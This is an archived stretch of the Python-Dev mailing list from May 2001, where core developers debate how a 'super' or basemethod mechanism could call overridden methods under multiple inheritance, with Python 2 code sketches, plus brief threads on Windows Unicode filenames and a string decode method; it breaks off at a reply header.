References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF01381.592AE31B@lemburg.com> 
Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > 
> > > This doesn't work in Python since Python has multiple inheritance,
> > > e.g. super in
> > >
> > > class A(B,C):
> > >       def foo(self):
> > >               super.foo()
> > >
> > > is ambiguous.
> > 
> > I'm not sure what you mean.  The search is totally well-defined: first
> > search B for a foo method, then search C.
> 
> I thought you were talking about an abstract super class which is
> how Java uses this term. 

Ah.  I didn't realize.  This would suggest that another (not yet
mentioned) suggestion would be to spell the basemethod call as

    super.foo(self)

keeping more in line with the tradition of passing self explicitly
when calling basemethods.

> Rereading some of the posts, I think you are indeed referring to
> the method which foo overrides -- this is what I call basemethod
> (since it is implemented in one of the base classes).

Aha.

> > > I'd rather suggest adding a function for finding the basemethod
> > > of a method. This is probably the most common task in this context.
> > 
> > I've never heard of the concept of basemethod, but if I may venture a
> > guess, it would be the same definition as I give above.
> 
> The basemethod can be defined as the first method of the same name
> found in the inheritance tree using the standard Python lookup
> strategy (left-right, depth first) when continuing the lookup search
> at the node in the inheritance tree which defines the method querying
> the basemethod.

Yes, that's what I guessed.

> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?
> 
> Note that there are many ways of defining what a basemethod
> is, due to the ambiguities that are caused by multiple inheritance
> (e.g. the same base class may appear in different branches of the
> inheritance tree).

Well, the search will find one definite method, but you're right that
there may be situations where it's necessary to specify the specific
base class!

In C++ that is solved by writing B::foo() or C::foo().  Python doesn't
have "::" and instead overloads the "." operator.  Hmm, so even
introducing super doesn't completely remove the need to be able to
write C.foo to reference the unbound method foo of class C, and this
may require that my ugly rule still be needed.

AFAIK, Smalltalk has only single inheritance, and so does Java, so
there 'super' is enough.  Will we need to add a "::" operator to
Python???
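The unbound-method spelling already plays the role of C++'s `C::foo()`. A sketch in present-day Python 3 with a hypothetical diamond (`A`, `B`, `C`, `D`), contrasting an explicitly chosen base with the method the MRO-based `super` would pick:

```python
class A:
    def foo(self):
        return "A.foo"

class B(A):
    def foo(self):
        return "B.foo"

class C(A):
    def foo(self):
        return "C.foo"

class D(B, C):
    def foo(self):
        # Python's spelling of C++'s C::foo(): name the class, pass self.
        return C.foo(self)


print(D().foo())              # C.foo
print(super(D, D()).foo())    # B.foo: the next class after D in D.__mro__
```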

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:19:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:19:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200."
             <3AF013ED.8A190FE2@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF013ED.8A190FE2@lemburg.com> 
Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com>

> Here's an implementation of what I currently use to track down
> the basemethod (taken from mx.Tools):

How am I supposed to use this?

I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
required.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:23:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:23:33 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200."
             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>

> > Except that sometimes you really do want x.__class__.__classdict__ to
> > have priority (e.g. for "guarded" attributes).
> 
> What's a "guarded" attribute?

I meant an attribute that's implemented by a pair of get and set
functions.  This is very useful; my proposed design lets you define
this more directly rather than requiring you to override __getattr__
and __setattr__.
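Such a get/set pair is what the `property` built-in, added later in Python 2.2, packages up. A minimal Python 3 sketch with a hypothetical `Account` class; a property is a data descriptor on the class, so it takes priority over an entry of the same name in the instance `__dict__`, which is the class-over-instance priority mentioned above.

```python
class Account:
    """Hypothetical example class with one guarded attribute."""

    def __init__(self):
        self._balance = 0

    def _get_balance(self):
        return self._balance

    def _set_balance(self, value):
        # The setter guards the attribute by rejecting invalid values.
        if value < 0:
            raise ValueError("balance cannot be negative")
        self._balance = value

    balance = property(_get_balance, _set_balance)


acct = Account()
acct.balance = 10              # goes through _set_balance
acct.__dict__["balance"] = 99  # shadow attempt in the instance dict
print(acct.balance)            # 10: the class-level property wins
```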

> > But the issue of backwards compatibility is a big one here
> 
> I was thinking that, while this is still in the __future__,
> the __dict__ attribute would be a pseudo-dict that, by
> default, behaves like the union of the old __dict__ and
> the __classdict__.

Actually, I think that what's in the __dict__ is just perfect; it's
the definition of getattr(classobject, name) where name is both an
instance and a class method that causes trouble.
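A sketch of that ambiguity in present-day Python 3, assuming a hypothetical metaclass `Meta` that defines a class-level `describe` while the class `C` defines an instance-level `describe` of its own. `C.describe` resolves to the function in C's own namespace; the metaclass version has to be asked for explicitly:

```python
class Meta(type):
    def describe(cls):
        return "class-level describe of " + cls.__name__


class C(metaclass=Meta):
    def describe(self):
        return "instance-level describe"


print(C().describe())                        # instance-level describe
print(C.describe is C.__dict__["describe"])  # True: C's own namespace wins
print(Meta.describe(C))                      # class-level describe of C
```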

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:29:20 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:29:20 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
	            <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com>
Message-ID: <3AF019C0.716E6D35@lemburg.com>

Guido van Rossum wrote:
> 
> > Here's an implementation of what I currently use to track down
> > the basemethod (taken from mx.Tools):
> 
> How am I supposed to use this?
> 
> I tried this:
> 
>     class B:
>         def foo(self):
>             print "B.foo"
> 
>     class C(B):
>         def foo(self):
>             print "C.foo"
>             B.foo(self)
>             print basemethod(self.foo) # Expect this to be B.foo

This finds the basemethod of self.foo; since self is a D instance,
that is the method overridden by D.foo (C.foo). To get at the
basemethod of C.foo, you'd have to call

basemethod(self, C.foo)

Note that the intent here is to be able to call basemethods
even in case the defining class is only a mixin class -- a very
common situation at least in many of my applications (keeps
inheritance trees shallow and increases readability of the code).
 
>     class D(C):
>         def foo(self):
>             print "D.foo"
>             C.foo(self)
> 
>     d = D()
>     d.foo()
> 
> but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
> required.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Wed May  2 16:15:58 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 16:15:58 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>
Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid>

thomas wrote:

> > why not spell it out:
> > 
> >     self.__super__.foo(arg1, arg2)
> > 
> > or
> > 
> >     self.super.foo(arg1, arg2)
> > 
> > or
> > 
> >     super(self).foo(arg1, arg2)
>
> IMO we still need to specify the class, and there we are:
> 
>      super(self, MyClass).foo(arg1, arg2)

isn't that the same as self.__class__ ?  in which case
super is something like:

import new

class super:
    def __init__(self, instance):
        self.instance = instance
    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague)

Cheers /F


From donb at abinitio.com  Wed May  2 16:41:14 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 10:41:14 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <200105021441.KAA08444@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> [Greg Ward, welcome back!]
> >   * 'super' is a magic object that only makes sense inside a 'def'
> >     inside a 'class' (at least for now; perhaps it could be generalized
> >     to work at class scope as well as method scope, but let's keep
> >     it simple)
> 
> Yes, that's about the only way it can be made to work.  The compiler
> will have to (1) detect that 'super' is a free variable, and (2) make
> it a local and initialize it with the proper magic.  Or, to relieve
> the burden from the symbol table, we could make super a keyword, at
> the cost of breaking existing code.

I'm not at all sure I like the idea of 'super'.  It's far more magic
than I am used to (coming from Python at least).  Currently, we spell
'super' like this:

     class foo(bar):
         def __repr__(self):
             return bar.__repr__(self)  # that's super!

I like the explicit nature of it.  As Guido points out however, this
ends up being ambiguous when we try to make classes more
"instance-like".

Now, how do I like to spell super?

     class foo(bar):
         def __repr__(self):
             return bar._.__repr__(self)  # now that's really super!

or, for those who like the "keyword":

     class foo(bar):
         def __repr__(self):
             super = bar._
             return super.__repr__(self)

The trick here is in the implementation of getattr on the '_'.  It returns
a proxy object for the class.  When attributes are accessed through it
a different search path is taken.  This path is the same path that
would be taken by instance attribute look up.  In my code, I refer to
this object as the 'unbound instance'.  Since accessing a function
through this object will yield an unbound instance method, the name
makes sense to me.
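A minimal sketch of the "unbound instance" proxy in present-day Python 3. This is not Donald's implementation (which the message does not show); the names `UnboundInstance` and `UnboundInstanceAttr` are hypothetical. Accessing `bar._` returns a proxy whose attribute lookup walks the `bar.__mro__` namespaces, the path an instance lookup takes, and returns plain functions, Python 3's equivalent of unbound methods:

```python
class UnboundInstance:
    """Hypothetical proxy: looks names up the way an instance would."""

    def __init__(self, cls):
        self._cls = cls

    def __getattribute__(self, name):
        cls = object.__getattribute__(self, "_cls")
        # Only the class's own MRO namespaces are searched; the metaclass
        # is never consulted, so a class-level method cannot shadow it.
        for klass in cls.__mro__:
            if name in vars(klass):
                return vars(klass)[name]
        raise AttributeError(name)


class UnboundInstanceAttr:
    """Descriptor that makes Klass._ return UnboundInstance(Klass)."""

    def __get__(self, obj, owner):
        return UnboundInstance(owner)


class bar:
    _ = UnboundInstanceAttr()

    def __repr__(self):
        return "bar"


class foo(bar):
    def __repr__(self):
        return "foo/" + bar._.__repr__(self)


print(repr(foo()))  # foo/bar
```

The proxy overrides `__getattribute__` rather than `__getattr__` because it inherits `__repr__` from `object` itself; a `__getattr__` hook would never run for that name.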

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From thomas.heller at ion-tof.com  Wed May  2 16:49:02 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:49:02 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook>

> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:
> 
> import new
> 
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
> 
No, it's not the same. Consider:

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

This prints:
test X

test Y
test X

test Y
test Y
(more test Y lines deleted)
RuntimeError: maximum recursion depth exceeded

This is because, for the Z() object, super(self) searches the bases of
self.__class__ (that is, Z's bases), finds Y.test again and recurses;
the search should start in the X class, not in the Y class.
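Thomas's point can be reproduced in present-day Python 3. `naive_super` below is a hypothetical stand-in for the proxy quoted above: it searches the bases of the instance's class, so for a `Z` instance it finds `Y.test` again. The fixed version names its own class, using the built-in `super(FixedY, self)`:

```python
class naive_super:
    """Hypothetical proxy that searches the bases of the instance's class."""

    def __init__(self, instance):
        self.instance = instance

    def __getattr__(self, name):
        for klass in type(self.instance).__bases__:
            member = getattr(klass, name, None)
            if member is not None:
                # Bind functions to the instance, as a method call would.
                if callable(member):
                    return member.__get__(self.instance, klass)
                return member
        raise AttributeError(name)


class X:
    def test(self):
        return ["X"]

class Y(X):
    def test(self):
        return ["Y"] + naive_super(self).test()

class Z(Y):
    pass

class FixedY(X):
    def test(self):
        # Naming the defining class fixes where the search starts.
        return ["Y"] + super(FixedY, self).test()

class FixedZ(FixedY):
    pass


print(Y().test())       # ['Y', 'X']
print(FixedZ().test())  # ['Y', 'X']
try:
    Z().test()          # type(self).__bases__ is (Y,), so Y.test runs again
except RecursionError:
    print("Z().test() recursed without end")
```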


Thomas


From thomas.heller at ion-tof.com  Wed May  2 16:53:17 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:53:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook>

This implementation of super works correctly:

import new

class super:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass
    def __getattr__(self, name):
        for klass in (self.klass,) + self.klass.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self, X).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

Thomas


From donb at abinitio.com  Wed May  2 17:31:45 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:31:45 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105021531.LAA08940@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> AFAIK, Smalltalk has only single inheritance, and so does Java, so
> there 'super' is enough.  Will we need to add a "::" operator to
> Python???

Multiple inheritance introduces a potential wrinkle in my definition
of the unbound instance.  The problem is that search starts one level
too high.  That is in:

    class foo(b1, b2):
          def __repr__(self):
              super = b1._  #this one
              super = b2._  #or this one?
              return super.__repr__(self)

we don't know which base class to choose as the starting point for the
search.  This problem already exists.  Now, if we want to avoid it,
this:

    class foo(b1, b2):
          def __repr__(self):
              super = foo.__super__
              return super.__repr__(self)


comes to mind.
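A sketch of the `foo.__super__` idea in present-day Python 3, assuming a hypothetical descriptor `SuperAttr` installed on a common root class `Root`. `foo.__super__` returns a proxy that searches `foo.__mro__` but skips `foo` itself, so the starting point is fixed by the class rather than by whichever base the method author picks:

```python
class SuperProxy:
    """Hypothetical proxy: searches cls.__mro__, skipping cls itself."""

    def __init__(self, cls):
        self._cls = cls

    def __getattribute__(self, name):
        cls = object.__getattribute__(self, "_cls")
        for klass in cls.__mro__[1:]:
            if name in vars(klass):
                return vars(klass)[name]
        raise AttributeError(name)


class SuperAttr:
    """Descriptor that makes Klass.__super__ return SuperProxy(Klass)."""

    def __get__(self, obj, owner):
        return SuperProxy(owner)


class Root:
    __super__ = SuperAttr()

class b1(Root):
    def __repr__(self):
        return "b1"

class b2(Root):
    def __repr__(self):
        return "b2"

class foo(b1, b2):
    def __repr__(self):
        sup = foo.__super__
        return "foo/" + sup.__repr__(self)


print(repr(foo()))  # foo/b1
```

Because it follows `foo`'s own MRO rather than `type(self).__mro__`, this proxy does not cooperate with classes that later inherit from `foo` alongside other bases; the built-in `super(foo, self)` does.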

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                      ...Will hack for sushi...


From donb at abinitio.com  Wed May  2 17:37:39 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:37:39 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <200105021537.LAA09063@localhost.localdomain>

"Fredrik Lundh" <fredrik at effbot.org> wrote,
> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:

super is a lexically scoped concept.  You can't ask the instance for it
since its value differs depending on the class in which it is needed.  Just
as:

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__repr__(self)

would get you into an infinite loop, while:

        class foo(bar):
              def __repr__(self):
                  return bar.__repr__(self)

won't.  Now, don't go thinking that

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__bases__[0].__repr__(self)

will do you any good either ;) Because it won't!
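Present-day Python 3 later built this lexical scoping into the language: a method that mentions `__class__` or calls `super()` with no arguments gets an implicit closure cell holding the class whose body defines it (PEP 3135). A small sketch with hypothetical classes `Base`, `Sub` and `SubSub`:

```python
class Base:
    def defining_class(self):
        # Mentioning __class__ makes the compiler create a closure cell
        # holding the class whose body defines this method (Base).
        return __class__

    def __repr__(self):
        return "Base"


class Sub(Base):
    def __repr__(self):
        # Zero-argument super() uses the same cell, so here it always
        # means super(Sub, self), whatever type(self) is.
        return "Sub/" + super().__repr__()


class SubSub(Sub):
    pass


print(SubSub().defining_class() is Base)  # True
print(repr(SubSub()))                     # Sub/Base
```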

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Wed May  2 19:02:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:02:19 -0500
Subject: [Python-Dev] Unicode and the Windows file system.
In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
             <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com>

> Now that 2.1 is out the door, how do we feel about getting these Unicode
> changes in?
> 
> http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 

No problem for me, although the context-sensitive semantics of the
MBCS encoding still elude me.  (Who cares, it's Windows. :-)

Are you & MAL capable of sorting this out?  Do you want me to add a +1
comment to the tracker?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gmcm at hypernet.com  Wed May  2 18:01:20 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Wed, 2 May 2001 12:01:20 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
References: Your message of "Wed, 02 May 2001 14:48:20 +1200."             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <3AEFF710.9471.8025D7EA@localhost>

Hmmm.

Some time ago, Tim asked the question: "Why do you want 
this stuff?". As far as I can recall, he got 2 answers: "So I 
don't have to 'initialize(Klass)'" and "me, too". I don't think 
those qualify as answers.

Some time ago (cf, types-sig brouhaha of a couple years ago) 
I concluded that the only purpose for this stuff was __getattr__ 
and __setattr__ hacks. I reached this conclusion by going 
nutzo using (Guido's) metaclass hook, and studying the 
available uses of ExtensionClass (I could find no public usage 
of Don's elegant madness).

I rather liked Guido's "Turtles all the way down" (but his 
description was so cryptic that my interpretation may have 
been a hallucination), and I suspect he's still headed that way.

Nonetheless, I would like to see this discussion of the 
elegance of Smalltalk's incompatible model (and how to fudge 
it in Python) balanced by some discussion of the expected 
pragmatic benefits. (That's a different topic from subclassing 
types.)

start-with-"if-God-wanted-metaclasses-he-wouldn't-have-
invented-proxies"-<wink>-ly y'rs


- Gordon


From fredrik at effbot.org  Wed May  2 17:47:08 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 17:47:08 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid>

Donald Beaudry wrote:
> super is a lexically scoped concept.  You can't ask the instance for it
> since its value differs depending on the class in which it is needed

oh, you want people to be able to inherit from classes
using super?

guess we'll have to use

        sys._getframe().f_back.f_method.im_class

instead, then ;-)

(any special reason why frame objects don't contain a
pointer to the corresponding function/method object?)

Cheers /F


From mal at lemburg.com  Wed May  2 18:11:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 18:11:50 +0200
Subject: [Python-Dev] Unicode and the Windows file system.
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> <200105021702.MAA01317@cj20424-a.reston1.va.home.com>
Message-ID: <3AF031C6.324D25D5@lemburg.com>

Guido van Rossum wrote:
> 
> > Now that 2.1 is out the door, how do we feel about getting these Unicode
> > changes in?
> >
> > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470
> 
> No problem for me, although the context-sensitive semantics of the
> MBCS encoding still elude me.  (Who cares, it's Windows. :-)
> 
> Are you & MAL capable of sorting this out?  Do you want me to add a +1
> comment to the tracker?

I'll take care of the parser marker stuff and Mark can do the
rest ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 19:17:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:17:50 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200."
             <00a901c0d31f$2797a370$e46940d5@hagrid> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>  
            <00a901c0d31f$2797a370$e46940d5@hagrid> 
Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com>

> (any special reason why frame objects don't contain a
> pointer to the corresponding function/method object?)

Because (until now) there was no need.  The frame needs to know about
the code object, but the rest of the function's context is not needed.
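The frame-to-code link Guido describes can be observed in present-day CPython. `sys._getframe` is a CPython-specific helper, and `current_code` is a hypothetical function used only for illustration:

```python
import sys


def current_code():
    # The executing frame exposes the code object it runs (f_code).
    return sys._getframe().f_code


code = current_code()
print(code is current_code.__code__)  # True
print(code.co_name)                   # current_code
```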

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:13:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:13:17 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
Message-ID: <3AF04E3D.45AE4F4B@lemburg.com>

We already have "data".encode(encoding) which encodes the string data
by passing it through the encoder of the given encoding.

Wouldn't it be worthwhile to add direct access to codec decoders
through string methods as well ?

(Note that this addition only makes sense for string objects,
since Unicode cannot be decoded.)

Also, would there be any objections adding some more standard
codecs to the system ? I'm thinking of wrapping the binascii 
module APIs in form of codecs...

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:18:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:18:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200."
             <3AF04E3D.45AE4F4B@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> 
Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com>

> We already have "data".encode(encoding) which encodes the string data
> by passing it through the encoder of the given encoding.
> 
> Wouldn't it be worthwhile to add direct access to codec decoders
> through string methods as well ?
> 
> (Note that this addition only makes sense for string objects,
> since Unicode cannot be decoded.)
> 
> Also, would there be any objections adding some more standard
> codecs to the system ? I'm thinking of wrapping the binascii 
> module APIs in form of codecs...

Can you provide examples of where this can't be done using the
existing approach?

Code-bloat police anyone?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:32:46 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:32:46 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
Message-ID: <3AF052CE.E928BDA1@lemburg.com>

Guido van Rossum wrote:
> 
